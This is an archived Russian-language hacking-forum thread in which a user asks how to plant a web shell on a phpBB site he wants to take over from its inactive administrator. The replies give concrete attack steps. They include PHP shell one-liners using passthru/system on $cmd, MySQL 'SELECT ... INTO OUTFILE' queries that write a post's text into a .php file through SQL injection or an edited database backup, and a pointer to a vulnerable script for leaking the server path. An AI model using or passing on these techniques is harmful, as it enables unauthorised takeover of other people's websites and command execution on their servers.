Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
07.12.2005, 17:22
|
|
Постоянный
Регистрация: 03.03.2005
Сообщений: 351
Провел на форуме:
1120282
Репутация:
112
|
|
Залить шел на phpBB
Здрасте, народ! 
Столкнулся с проблемой... Мона ли на phpBB залить шел. Если да то как расскажите подробней.
Хочу сайт забрать, а то админ на сайте появляется раз в год и них ничё не делает  |
|
|
07.12.2005, 18:06
|
|
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
Провел на форуме:
5605982
Репутация:
523
|
|
SELECT post_text FROM phpbb_posts_text WHERE post_id =1234 INTO OUTFILE "/full/path/to/rw/dir/shell.php"
смотрим номер нашего поста, подставляем в post_id а запостить нужно
<? passthru($cmd); ?>
путь можно узнать дырой в скрипте /db/oracle.php
SELECT word FROM phpbb_words WHERE word_id = 1 INTO OUTFILE "/full/path/to/rw/dir/shell.php"
добавляем в админке наше слово (сами знаете какое) и восстанавливаем базу
Если помог, то репу мне повысь=))) А вообще Мемберу нужно самому уметь пользоваться поиском...=))) (не в обиду)
|
|
|
|
07.12.2005, 18:45
|
|
Постоянный
Регистрация: 03.03.2005
Сообщений: 351
Провел на форуме:
1120282
Репутация:
112
|
|
<<YaYaYa>> Блин скажи лучше от куда слил инфу? Нифига не понял... Наверно я тупой...
|
|
|
|
07.12.2005, 18:51
|
|
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
Провел на форуме:
5605982
Репутация:
523
|
|
А что ты не понял? Через мускул заливаешь шел вот таким образом... по-моему все ясно
|
|
|
|
07.12.2005, 18:53
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463
Репутация:
2258
|
|
а ты себя не мучай посмотри на rst.void.ru там вроде есть экспл для заливки шелла=)
не понял как это))
инфа с секьюрити сайтов канешна=)
сначала создаем топик с <? system($cmd) ?>
потом с помощью скуля той строкой которую ЙаЙа дал записываем название той темы в файл=) так что ЙаЙа повысь репу за инфу а мне за объяснение гы)
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|
|
07.12.2005, 18:55
|
|
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
Провел на форуме:
5605982
Репутация:
523
|
|
m0nzt3r поддерживаю=))
|
|
|
|
07.12.2005, 18:58
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
Блин скажи лучше от куда слил инфу? Нифига не понял... Наверно я тупой...
это вставляеться в место где проходит скуль инъекция.
но врядли пройдет такая маза, думаю прав не хватит
|
|
|
|
07.12.2005, 19:04
|
|
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
Провел на форуме:
5605982
Репутация:
523
|
|
Известно что когда бы делаешь backup, скачивается файл, содержащий mysql-запросы, которые выполняются после восстановления.
Предположим что админ криво настроил с-му и у mysqld есть права на запись в какуюто папку))
Тогда мы бекапаем базу, потом редактируем чтобы выполнялся
SELECT ... FROM phpbb_posts WHERE ...=... INTO OUTFILE "/../../..... ..."
пишем соответствующий пост, чтобы его текст оказался в файле. Потом восстанавливаем базу, и запрос
SELECT ... FROM phpbb_posts WHERE ...=... INTO OUTFILE "/../../..... ..."
выполняется
vorishka думаю теперь понятно будет.........
|
|
|
|
07.12.2005, 19:22
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463
Репутация:
2258
|
|
k1b0rg ну может у него доступ в админку есть))
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|
|
07.12.2005, 19:36
|
|
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
Провел на форуме:
5605982
Репутация:
523
|
|
Сообщение от m0nzt3r
ну может у него доступ в админку есть))
Если бы у него не было бы лоступа в админку, то он бы спрашивал как получить этот самый доступ, а не как залить шел. Я так думаю)))
А вообще по моим постам думаю все ясно. Хотя это не всегда проходит, т.к. папка куда ты хочешь залить шел должна быть открыта на запись, а таких папок иногда бывает не много=)) Поэтому придется помутить с этим.
ЗЫ жадные вы на репутацию)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
